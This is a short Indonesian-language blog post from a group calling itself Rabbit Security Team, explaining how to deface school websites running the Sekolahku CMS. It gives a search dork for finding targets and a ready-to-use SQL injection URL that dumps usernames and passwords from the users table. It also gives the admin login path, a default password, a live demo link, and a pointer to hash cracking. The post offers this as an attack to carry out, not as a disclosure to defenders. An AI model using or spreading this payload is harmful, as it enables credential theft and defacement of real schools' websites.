Cara Deface Dengan CMS Sekolahku

Posted by : Sabtu, 03 Desember 2016
Rabbit Security Team

Hai sob ketemu lagi
kali ini admin akan share cara deface nih :v
yap deface cms sekolahku, cms ini menurut mimin cms baru
Langsung aja :)

Dork = "Developed by sekolahku.web.id" ( kembangin )

Exploit = /home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+

Admin Login = www.site.sch.id/Login
Admin Default UserPass = Administrator

Demo = http://cms.sekolahku.web.id/home/get_agenda_sekolah?end=1%27union+select+1%2Cgroup_concat%280x3c6c693e%2Cusername%2C0x3a%2Cpassword%29+from+users--+

Jika ada [] <- Berarti website tersebut Vuln

 Pokoknya ga beda jauh sama sql lokomedia, selanjutnya kembangin sendiri. cuma hashnya yang kuat, kalo ga bisa hash ya tebak tebakan aja :v atau pake hashcat.net

Sekian dari saya, 
Thanks buat Fsociety from Rabbit Sec Team
Tags :
Niqo Qintharo

Next
Previous
Click here for Comments

0 komentar: